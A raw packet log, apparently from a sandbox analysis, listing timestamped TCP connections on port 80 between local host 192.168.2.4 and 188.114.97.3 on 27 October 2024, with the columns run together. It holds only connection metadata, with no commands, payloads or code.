                                                                                                                  Oct 27, 2024 19:23:05.582480907 CET4979480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:05.583106995 CET4980080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:05.588357925 CET8049794188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:05.588413954 CET4979480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:05.588449001 CET8049800188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:05.588640928 CET4980080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:05.588754892 CET4980080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:05.594101906 CET8049800188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:05.946269035 CET4980080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:05.952493906 CET8049800188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:06.176573992 CET8049800188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:06.299352884 CET4980080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:06.480262995 CET8049800188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:06.601731062 CET4980080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:06.603252888 CET4980680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:06.607503891 CET8049800188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:06.607568979 CET4980080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:06.608712912 CET8049806188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:06.610836029 CET4980680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:06.610922098 CET4980680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:06.616280079 CET8049806188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:06.961699009 CET4980680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:06.967241049 CET8049806188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:07.220874071 CET8049806188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:07.326831102 CET4980680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:07.513197899 CET8049806188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:07.664762020 CET4980680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:07.955596924 CET4980680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:07.956546068 CET4981680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:07.961901903 CET8049806188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:07.961949110 CET8049816188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:07.962032080 CET4980680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:07.962044001 CET4981680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:07.962234020 CET4981680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:07.967600107 CET8049816188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:20.606944084 CET4989680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:20.608278990 CET4989680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:20.615586042 CET8049896188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:20.631827116 CET4989780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:20.639164925 CET8049897188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:20.639219999 CET4989780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:20.659945011 CET4989780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:20.667201042 CET8049897188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:20.963224888 CET4989680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:21.009491920 CET4989780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:21.036864042 CET8049896188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:21.036992073 CET8049896188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:21.037295103 CET8049897188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:21.232511044 CET8049896188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:21.240716934 CET8049897188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:21.289783001 CET4989780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:21.357896090 CET4989680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:21.472637892 CET8049897188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:21.524133921 CET4989780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:21.539321899 CET8049896188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:21.600328922 CET4989680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:21.600387096 CET4989780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:21.601052046 CET4990380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:21.606259108 CET8049896188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:21.606329918 CET4989680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:21.606597900 CET8049897188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:21.606769085 CET4989780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:21.606950998 CET8049903188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:21.607038021 CET4990380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:21.607111931 CET4990380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:21.612428904 CET8049903188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:21.962794065 CET4990380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:21.968235016 CET8049903188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:22.226033926 CET8049903188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:22.274266005 CET4990380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:22.528465986 CET8049903188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:22.571059942 CET4990380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:22.647942066 CET4990380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:22.648524046 CET4990980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:22.656063080 CET8049909188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:22.656423092 CET4990980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:22.656532049 CET4990980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:22.656816006 CET8049903188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:22.656877995 CET4990380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:22.663887024 CET8049909188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:23.023518085 CET4990980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:23.028933048 CET8049909188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:23.260824919 CET8049909188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:23.305416107 CET4990980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:23.475785971 CET8049909188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:23.524144888 CET4990980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:23.608891010 CET4990980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:23.612884045 CET4991580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:23.614873886 CET8049909188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:23.614955902 CET4990980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:23.618180037 CET8049915188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:23.618253946 CET4991580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:23.620448112 CET4991580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:23.626663923 CET8049915188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:23.977475882 CET4991580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:23.982948065 CET8049915188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:24.221551895 CET8049915188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:24.274137974 CET4991580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:24.533438921 CET8049915188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:24.533529997 CET8049915188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:24.533579111 CET4991580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:24.667953968 CET4991580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:24.669168949 CET4992180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:24.673712015 CET8049915188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:24.673770905 CET4991580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:24.674474955 CET8049921188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:24.674673080 CET4992180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:24.674752951 CET4992180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:24.679970026 CET8049921188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:25.024260998 CET4992180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:25.029685974 CET8049921188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:25.284326077 CET8049921188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:25.367903948 CET4992180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:25.595818996 CET8049921188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:25.664773941 CET4992180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:25.729916096 CET4992180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:25.730463028 CET4993180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:25.735511065 CET8049921188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:25.735564947 CET4992180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:25.735815048 CET8049931188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:25.735878944 CET4993180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:25.736021996 CET4993180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:25.741349936 CET8049931188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:26.086759090 CET4993180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:26.092184067 CET8049931188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:26.350963116 CET8049931188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:26.399164915 CET4993180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:26.545418978 CET4993680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:26.550741911 CET8049936188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:26.550806999 CET4993680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:26.551053047 CET4993680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:26.556358099 CET8049936188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:26.677417994 CET8049931188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:26.727272034 CET4993180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:26.982070923 CET4993680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:26.987431049 CET8049936188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:26.987550974 CET8049936188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:27.147943020 CET8049936188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:27.176400900 CET4993180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:27.177023888 CET4993980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:27.182163000 CET8049931188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:27.182719946 CET8049939188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:27.182780981 CET4993180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:27.182805061 CET4993980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:27.183696985 CET4993980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:27.188993931 CET8049939188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:27.355957031 CET4993680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:27.454665899 CET8049936188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:27.539858103 CET4993980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:27.545217991 CET8049939188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:27.658334017 CET4993680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:27.785991907 CET8049939188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:27.961667061 CET4993980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:28.388420105 CET8049939188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:28.389286995 CET8049939188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:28.389337063 CET4993980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:28.687622070 CET4993680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:28.687675953 CET4993980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:28.688231945 CET4994880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:28.755903006 CET8049948188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:28.755913973 CET8049936188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:28.755995035 CET4993680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:28.756009102 CET4994880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:28.756151915 CET4994880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:28.756488085 CET8049939188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:28.757179022 CET4993980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:28.761543036 CET8049948188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:29.102458954 CET4994880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:29.107873917 CET8049948188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:29.360512972 CET8049948188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:29.414916992 CET4994880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:29.762352943 CET8049948188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:29.762517929 CET8049948188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:29.762562990 CET4994880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:29.762656927 CET8049948188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:29.762726068 CET4994880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:29.891168118 CET4994880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:29.893774986 CET4995480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:29.896843910 CET8049948188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:29.896893978 CET4994880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:29.899120092 CET8049954188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:29.899183989 CET4995480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:29.902301073 CET4995480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:29.907594919 CET8049954188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:30.264959097 CET4995480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:30.271051884 CET8049954188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:30.500969887 CET8049954188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:30.664804935 CET4995480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:30.802417040 CET8049954188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:42.928045988 CET5003280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:42.928680897 CET5003980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:42.933871984 CET8050032188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:42.933942080 CET5003280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:42.934058905 CET8050039188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:42.934144974 CET5003980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:42.934261084 CET5003980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:42.939611912 CET8050039188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:43.289904118 CET5003980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:43.295526028 CET8050039188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:43.535711050 CET8050039188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:43.586669922 CET5003980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:43.839453936 CET8050039188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:43.883555889 CET5003980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:43.976687908 CET5003980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:43.977838993 CET5004580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:43.982817888 CET8050039188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:43.983225107 CET8050045188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:43.983304977 CET5003980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:43.983334064 CET5004580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:43.983424902 CET5004580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:43.990870953 CET8050045188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:44.336946964 CET5004580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:44.344932079 CET8050045188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:44.394589901 CET5004680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:44.400219917 CET8050046188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:44.401137114 CET5004680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:44.401252985 CET5004680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:44.409457922 CET8050046188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:44.585088968 CET8050045188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:44.633555889 CET5004580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:44.758749962 CET5004680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:44.766751051 CET8050046188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:44.766885042 CET8050046188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:44.783058882 CET8050045188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:44.836818933 CET5004580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:45.000314951 CET8050046188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:45.039820910 CET5004680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:45.224514961 CET8050046188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:45.274307966 CET5004680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:45.628740072 CET5004580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:45.628819942 CET5004680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:45.634285927 CET5005680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:45.634468079 CET8050045188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:45.634515047 CET5004580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:45.634747028 CET8050046188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:45.634829998 CET5004680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:45.639731884 CET8050056188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:45.639895916 CET5005680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:45.639895916 CET5005680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:45.645308018 CET8050056188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:45.993535995 CET5005680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:45.998936892 CET8050056188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:46.250893116 CET8050056188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:46.305447102 CET5005680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:46.571002960 CET8050056188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:46.617957115 CET5005680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:46.699757099 CET5005680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:46.700567007 CET5006280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:46.705634117 CET8050056188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:46.705712080 CET5005680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:46.706017017 CET8050062188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:46.706103086 CET5006280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:46.706269979 CET5006280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:46.711903095 CET8050062188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:47.055536985 CET5006280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:47.061214924 CET8050062188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:47.316524982 CET8050062188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:47.367938995 CET5006280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:47.515790939 CET8050062188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:47.516052961 CET8050062188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:47.516154051 CET5006280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:47.657835960 CET5006280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:47.664112091 CET8050062188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:47.664177895 CET5006280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:47.666400909 CET5006880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:47.671870947 CET8050068188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:47.671956062 CET5006880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:47.673482895 CET5006880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:47.679069996 CET8050068188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:48.024363995 CET5006880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:48.029889107 CET8050068188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:48.276401997 CET8050068188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:48.321063042 CET5006880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:48.475914001 CET8050068188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:48.524348021 CET5006880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:48.684464931 CET5006880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:48.690452099 CET8050068188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:48.690524101 CET5006880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:48.691533089 CET5007580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:48.697101116 CET8050075188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:48.697181940 CET5007580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:48.699973106 CET5007580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:48.705390930 CET8050075188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:49.055764914 CET5007580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:49.062383890 CET8050075188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:49.295866966 CET8050075188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:49.493042946 CET5007580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:49.495891094 CET8050075188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:49.495975971 CET8050075188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:49.496026039 CET5007580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:49.625992060 CET5007580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:49.627121925 CET5008080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:49.631952047 CET8050075188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:49.632015944 CET5007580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:49.632921934 CET8050080188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:49.632987022 CET5008080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:49.633213043 CET5008080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:49.638861895 CET8050080188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:49.986319065 CET5008080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:49.991679907 CET8050080188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:50.245431900 CET8050080188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:50.289803028 CET5008080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:50.322506905 CET5008680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:50.327900887 CET8050086188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:50.330881119 CET5008680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:50.331048012 CET5008680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:50.336453915 CET8050086188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:50.445421934 CET8050080188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:50.492924929 CET5008080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:50.601457119 CET5008080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:50.608239889 CET8050080188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:50.608299971 CET5008080192.168.2.4188.114.97.3
